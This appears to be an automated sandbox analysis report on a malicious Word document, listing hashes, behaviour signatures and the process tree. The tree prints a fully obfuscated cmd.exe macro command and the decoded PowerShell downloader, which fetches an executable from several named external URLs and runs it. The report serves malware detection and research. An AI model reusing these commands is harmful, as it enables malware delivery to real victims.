Analysis
-
max time kernel
135s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
22-05-2024 02:03
General
-
Target
65a045b3e7cb246a0d73e75468b8273d_JaffaCakes118.doc
-
Size
87KB
-
MD5
65a045b3e7cb246a0d73e75468b8273d
-
SHA1
0f96771da3efd722bd337ca57f3514ba30e0f351
-
SHA256
e80762c5909a3c7f409c3f0273ed96154fc887463b6748a0a42cad16fadbf6e5
-
SHA512
42a202314570aa5963a7de0b0a386488ea48f3193015a2005f290419ee30aa574eaefc5beba38a34f99cb97e1c6c098c701a07b782879736b6daaf36e912473a
-
SSDEEP
1536:Yl0suyCPocn1kp59gxBK85fB7s+aM14E0/SO8Mkk:uu241k/W48cp
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 13 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65a045b3e7cb246a0d73e75468b8273d_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C"^s^et ^T^qL=(^'@^')&&^s^et ^iG9^w=^wR&&se^t V^W=a^d^o&&^s^e^t n6v=/&&s^e^t ^X^T=^w&&^s^e^t ^fP^B=k^}&&^se^t ^zv^q=^h^F.^o&&^s^e^t b^4=/^o&&^se^t ^AI=^q&&^s^et i^8^P=^ &&^s^et Rj^F^q=r&&^se^t N^9=^=&&s^e^t ^7^2G=oq=&&^s^et ^Zf^a=^:&&^s^e^t ^Z^P=^is^e^.&&^s^e^t ^5^KL=(&&se^t ^A3=^ec&&^s^e^t R^a=/&&s^e^t ^TX^P=p&&^s^et ^p^i1=/&&^se^t ^Xv=^:&&^s^e^t w^I^G^m=N^e&&s^e^t ^I^A^3=(^$&&^set ^I^qlR=^h&&^s^et ^5v^l=^er^s&&^s^e^t 5Cb=^t&&^s^et z^g=^;^$E&&^se^t ^j^d6=^i&&^s^e^t ^Bex^6=p^P&&^se^t ^B^PT=^e&&s^e^t ^pT=^t&&^s^e^t ^un^K=^G&&^se^t ^w^6^A=t^o&&^s^et Vl=^a&&^s^e^t ^xi=^d&&^se^t ^pW=^$w&&^s^et p^U=^h&&s^e^t nx7^m=^w &&^se^t ^X^pu=spo&&^s^e^t ^P^D^EN=^ i&&^se^t ^W^G=S^h^F^.^se&&^s^e^t ^4^MT^P=^';^f&&^s^e^t ^LV=^en&&s^e^t ^i^6=^S&&^s^e^t ^z^udI=n&&^s^e^t 4^XCe=N&&s^e^t ^ij=^]&&set R^e^p^8=^$^p&&^s^et ^Tv=^h^F&&^s^et N^En=^'^;&&^se^t F^l=^m/&&s^e^t ^4h=^$&&^s^et ^TF=^m&&s^e^t V^s= ^ &&^s^e^t J^g=)&&s^e^t ^5^d^w=^t&&s^e^t ^t^w=^=^ &&^s^et w^Z=^t&&s^e^t ^F^i^Q=^W&&^s^et 5^Z^Q^K=^eto^f&&^s^et ^Ys^T5=^0)^;&&^s^e^t ^Xd=c&&^s^e^t ^X9=^p&&^s^et ^jg^f=^$&&s^et ^F^YH=^Ep^t)^;&&set I^OC^D=^{&&s^e^t v^L^2=^ &&^s^et ^xy^Sh=^[&&^s^e^t ^I^A^k=^h&&^s^e^t ^x^ti^l=E^T^'^,&&^se^t ^T^Jdq=n^ ^$&&^s^et ^8^X^Q^4=^ &&s^e^t ^0^8^H=^e^t&&s^e^t ^9^Z2=^p&&^s^et XNkr=^ir&&^se^t ^OWY^8=^o&&^s^e^t ^2W=^b&&s^e^t ^uJ^F^H=^{&&^se^t ^U^b^k=^'^a&&^s^et ^3^y^9F=^:&&^s^et ^F^X^Yq=^an&&s^e^t n^x^LI=^e&&^s^et 7^K^u=^ &&s^e^t ^AN=^tr^y&&^set ^Q^1=^.&&^se^t Bv^0^i=s^x&&s^e^t ^a^h=^Sp&&^s^et ^t5^g=^he^l&&^s^e^t n^X=^m&&s^e^t ^J^9=;^$&&^s^e^t ^PN^Q=^w&&s^e^t ^as^7=^ &&^s^et ^4r^y=r^o&&^s^e^t N6^D= &&^se^t lt^K^Z=}^ &&s^e^t ^U^lv=i^l&&^se^t ^O^D=t^t^p&&^s^et nM^h^j=v&&^se^t ^b1C=S&&^s^et N^H=^.&&^s^et ZN=^o&&^se^t ^LRr=^Gu&&^s^et ^YJ=^K&&^s^et ^X^W=^er^pr&&^s^et b^A=^A&&^se^t q^pw^3=^tt&&^s^et ^w2Y=^S&&^se^t ^l^Sf^9=R&&s^e^t v^p=(&&^se^t F^A^x=seB^o^d&&^se^t ^az^B=^'^.&&^se^t ^F^x5W=^D^@&&s^e^t ^u^AR=c&&^s^et ^i^Z^O=^'&&^se^t ^a^bV=^e&&^s^et ^I^QD^T=^m&&^s^e^t ^U^fM=^$^P^X&&^s^e^t ^U^L=-^O&&^s^et ^3Cv=^ &&^s^et ^bn=/^w&&^s^e^t ^f^EG^A=d()&&s^e^t ^TI0^H=r^e^a&&set ^76=^T&&^s^e^t ^um=^w.&&^se^t ^j^x=^h&&^s^e^t pcC=n()&&^se^t 5^j^i=^ow&&^set V^F=r&&^se^t 5v^j=^ ^=&&^s^et ^Uz=^y&&^s^et ^pa^l^F=c^o^m&&^s^e^t ^j^i=^w&&^s^e^t ^83=i^t&&^se^t ^jE^7^f=e^m&&^se^t V^k=^t&&^s^et ^7^jO=^ ^ &&^s^et 3^kw^z=^d&&^s^e^t ^Je=/&&^se^t ^Z^9^M=s^t&&s^e^t qr^L=)^;^$wRw^.^s&&s^e^t P^X=^;&&s^e^t ^w^E^g=o&&^se^t n^XB=n&&^s^et ^ui=^GS&&^se^t U^K=^,&&^se^t ^P^EN=^e&&^se^t ^u^X2=^h&&^se^t ^OR=^;&&^s^et ^f^0cr=r^e&&^s^et ^O^A0=a^t&&s^e^t ^Wd0^M=^'m&&^s^et n^b=r^e&&^s^e^t ar^Q^E=^:/&&^s^e^t ^j^t=^;$&&^s^et ^qn=^H&&^s^e^t n^jv=^1^;$^wR^w&&s^e^t ^x^a^Jo=k^h^ark^iv&&^s^e^t F^A^k=a^.c&&s^e^t ^Y0^G=^w&&^se^t 8^0^L^E=p^'&&se^t A^5Vc=C^F&&^s^et ^L^x^K^Q=^l &&^s^et ^qs^B=e^s&&^s^e^t ^o^bf=^.b^i&&s^e^t ^j^y=^t^-^P&&^s^et t^x=n^ur^in^a&&s^e^t ^J6^k=^}&&set ^8V^k=^\^G&&^se^t n^0=m^a&&s^e^t ^2n=^:/&&^s^et F^Z=^o&&^s^e^t a^S^iI=@^h&&^se^t U^W^d=^t&&s^e^t ^50n^h=^ht&&s^e^t ^f^q=ac^h(^$^p&&set f^5=^{&&^s^et ^Z^7tc=^w&&^s^et ^p^z^TE=^.&&^s^et N^k^a=^S&&^s^e^t A^q=C^L^8&&^s^et ^5^qw=^ -&&^s^et ^X^s^e=s $^E^p&&^s^e^t ^f^u^7=t^w&&^se^t 3^J^gY=^h&&s^e^t ^O^q^x8=c^a&&^s^et Y^d^j=a^m&&^s^e^t ^U^J^T=^.^P&&^se^t o^j^lE=c^o&&s^e^t ^2^b=/0^@^h&&^s^et n^5^9=^.^wr&&^se^t ^ow^k=^a&&^s^e^t 0^B=^j&&^se^t ^4D^S=:&&set q^w^o=n^t&&s^e^t ^P^0tS=^s^t^e^m^.^I^O&&^s^et ^x^P=^'^h&&s^et ^fk^Xb=^Qr&&^s^e^t NVZ=^=(&&s^e^t P^iAD=^t&&^s^e^t A^u=t^a&&^s^e^t ^Ac^J3=H^o&&^s^e^t ^p^EZ=^e&&^s^e^t 0^56^x=^p&&^s^e^t Rur^p=^p^t&&^s^et ^0N=^o&&s^e^t 7^A^f=^l&&^s^e^t ^X^s=^.&&^se^t NC^p^3=e^e&&s^e^t f^b^GN=^a&&^s^et I^kv^B=t&&^s^et ^p^8=/k^l^i&&^s^et ^Ii^T=^p&&se^t ^TR5^y=^2&&^s^e^t ^qR=^b&&s^e^t ^t^LFC=P^p&&^s^et X^H=^Lhy^4^s^y&&se^t N^A^U=^inf&&^se^t ^A^S=^l&&^se^t ^w4=v^a&&^se^t ^5f=^o/&&s^e^t Rtc=^.^x^ml&&^s^e^t ^5^Wv=^h&&s^e^t ^X^3^fO=^$&&^se^t ^5q=^$&&^s^et O^Z^J=^tp&&^s^e^t 3^K^L^z=^l&&^se^t ^0^onB=^ ^ ^ &&^s^e^t ^Iy^L=/^T&&^s^et ^f9^47=^y&&s^e^t ^LH^Z=^.&&^s^et ^O^P1=z^.^u^a&&s^e^t w^e=/&&^se^t ^0^G=r&&^se^t ^wRv^D=m^@^htt^p:&&^s^e^t ^W^fG=^wR^w&&^set ^P^yhp=^G&&^s^et YM^g^x=w^w.^b&&s^e^t 7^Pg^M=n&&s^e^t yv^h^2=^e&&^s^et ^j^er=^t&&^se^t Rv=^W^K&&s^e^t r^0E=.^t^y&&^s^et ^l^L=^ &&^s^et ^7^uyr=');^$^S^h^F&&^se^t ^Q^0^Jr=b^j^e&&s^e^t 8^1=^e^w-^O^b&&^s^e^t ^F^U^m=^i&&^s^et 5^H=^m&&^s^e^t ^a^ms=^p&&^s^et ^w^arc=^a&&s^e^t ^0a=^= &&^se^t ^x^ur=()^+^'&&s^e^t V^1^U=i^.c^o&&^se^t N^y=c^t^ ^-c^om&&^se^t ^79^a= ^'&&^s^e^t 0B^z^7=/&&^se^t ^q^yOR=^.tr&&^s^e^t ^3n=^l&&^s^et 7^D=^e^x^e&&c^al^l ^se^t Ne=%^TX^P%%5^j^i%%^5v^l%%^t5^g%%^L^x^K^Q%%^U^fM%%^F^U^m%%N^9%%^U^b^k%%^ui%%N^En%%^X^3^fO%%^qn%%^7^2G%%^x^P%%^5^d^w%%U^W^d%%^a^ms%%ar^Q^E%%^Je%%^x^a^Jo%%^o^bf%%^O^P1%%R^a%%^u^X2%%^t^LFC%%^F^x5W%%^j^x%%q^pw^3%%^9^Z2%%^2n%%b^4%%t^x%%7^Pg^M%%^3n%%V^1^U%%^TF%%^Iy^L%%A^q%%^w^arc%%^fk^Xb%%b^A%%a^S^iI%%^O^D%%^4D^S%%0B^z^7%%n6v%%^X^T%%^Y0^G%%^um%%^f^u^7%%NC^p^3%%^w^6^A%%^PN^Q%%F^Z%%^OWY^8%%^p^z^TE%%o^j^lE%%F^l%%X^H%%^wRv^D%%^p^i1%%^p^8%%n^0%%^I^qlR%%f^b^GN%%^w4%%3^K^L^z%%^F^X^Yq%%^xi%%XNkr%%^I^QD^T%%F^A^k%%^0N%%5^H%%^q^yOR%%^2^b%%P^iAD%%O^Z^J%%^Zf^a%%w^e%%^bn%%YM^g^x%%^f^0cr%%q^w^o%%^X^W%%^Z^P%%N^A^U%%^5f%%^I^A^k%%A^5Vc%%^az^B%%^a^h%%^A^S%%^83%%^T^qL%%z^g%%Rur^p%%NVZ%%^xy^Sh%%^b1C%%^f9^47%%^P^0tS%%^U^J^T%%^ow^k%%5Cb%%^5^Wv%%^ij%%^Xv%%^3^y^9F%%^un^K%%^0^8^H%%^76%%^jE^7^f%%^Bex^6%%^O^A0%%p^U%%^x^ur%%^8V^k%%^LRr%%N^H%%7^D%%^7^uyr%%5v^j%%4^XCe%%8^1%%0^B%%^A3%%V^k%%^5^qw%%^pa^l^F%%^3Cv%%^Wd0^M%%Bv^0^i%%n^X%%7^A^f%%^TR5^y%%Rtc%%^50n^h%%w^Z%%8^0^L^E%%^J^9%%^iG9^w%%nx7^m%%^0a%%w^I^G^m%%^j^i%%^U^L%%^Q^0^Jr%%N^y%%^79^a%%V^W%%3^kw^z%%^qR%%^LH^Z%%^Z^9^M%%V^F%%^p^EZ%%Y^d^j%%^4^MT^P%%ZN%%^0^G%%^P^EN%%^f^q%%Rv%%^P^D^EN%%^T^Jdq%%^Ac^J3%%^AI%%J^g%%I^OC^D%%^AN%%f^5%%^5q%%^w2Y%%^zv^q%%0^56^x%%^LV%%v^p%%^i^Z^O%%^P^yhp%%^x^ti^l%%R^e^p^8%%^F^i^Q%%^YJ%%U^K%%^Ys^T5%%^4h%%^W^G%%^z^udI%%^f^EG^A%%^OR%%^pW%%^l^Sf^9%%^Z^7tc%%^X^s%%^w^E^g%%^Ii^T%%n^x^LI%%pcC%%^j^t%%^W^fG%%r^0E%%^X9%%yv^h^2%%i^8^P%%^t^w%%n^jv%%n^5^9%%^j^d6%%^j^er%%^B^PT%%^I^A^3%%N^k^a%%^Tv%%^Q^1%%n^b%%^X^pu%%n^XB%%F^A^x%%^Uz%%qr^L%%Vl%%nM^h^j%%5^Z^Q^K%%^U^lv%%^a^bV%%^5^KL%%^jg^f%%^F^YH%%^i^6%%A^u%%Rj^F^q%%^j^y%%^4r^y%%^Xd%%^qs^B%%^X^s^e%%I^kv^B%%P^X%%^2W%%^TI0^H%%^fP^B%%^O^q^x8%%^pT%%^u^AR%%3^J^gY%%^uJ^F^H%%^J6^k%%lt^K^Z%%^7^jO%%^as^7%%V^s%%^0^onB%%^l^L%%^8^X^Q^4%%N6^D%%v^L^2%%7^K^u%&&call %N^e%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $PXi='aGS';$Hoq='http://kharkiv.biz.ua/hPpD@http://onurinanli.com/TCL8aQrA@http://www.tweetowoo.com/Lhy4sym@http://klimahavalandirma.com.tr/0@http://www.brenterprise.info/hCF'.Split('@');$Ept=([System.IO.Path]::GetTempPath()+'\GGu.exe');$ShF =New-Object -com 'msxml2.xmlhttp';$wRw = New-Object -com 'adodb.stream';foreach($pWK in $Hoq){try{$ShF.open('GET',$pWK,0);$ShF.send();$wRw.open();$wRw.type = 1;$wRw.write($ShF.responseBody);$wRw.savetofile($Ept);Start-Process $Ept;break}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226KB
MD5827fcfdb509ea22eb41be97c29f2596d
SHA1a7418a660fc0d7fc4f8ce183adacdf546a929c46
SHA256c1e3da6d667b2023338ad1ccde0a232f4a9dc0592cd508632e95c37fe5295ba6
SHA512fed7f6da716c09299f9cb0f94d732b2e724b759c0bc30db4ef09d04eb0b267b13394cfd72e84728951ef83e63ce4ec1544579e8613826857498696d733d21159
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
136KB
-
Filesize
2.0MB